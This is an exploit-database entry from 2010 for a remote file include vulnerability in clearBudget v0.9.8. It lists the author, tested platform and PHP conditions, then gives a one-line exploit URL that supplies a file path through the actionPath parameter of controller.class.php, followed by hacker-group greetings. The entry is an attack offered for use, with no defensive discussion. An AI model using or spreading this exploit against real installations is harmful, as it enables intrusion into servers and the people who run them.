clearBudget v0.9.8 Remote File Include Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : clearBudget v0.9.8 Remote File Include Vulnerability
# Published : 2010-08-11
# Author : Offensive and Red-Stone
# Previous Title : Joomla Component com_neorecruit 1.4 SQL Injection Vulnerability
# Next Title : phpMUR Remote File Disclosure Vulnerability

# Exploit Title: clearBudget v0.9.8 Remote File Include
# Date: 10/08/2010
# Author: Offensive [Offsensive@live.com] ~ Red-Stone On Community !
# Software Link: [ http://www.clearbudget.net ]
# Version : v0.9.8
# Tested on: Windows XP

C0nditi0ns : PHP Version > 4.x.x
Expl0it Code : http://target/clearBudget.0.9.8/logic/controller.class.php?actionPath=[file]

Ramadan Kareem !
Gr33t'z : SA-h4x0r ~ LoOoRd ~ Inj3ct0r M3ms & T3am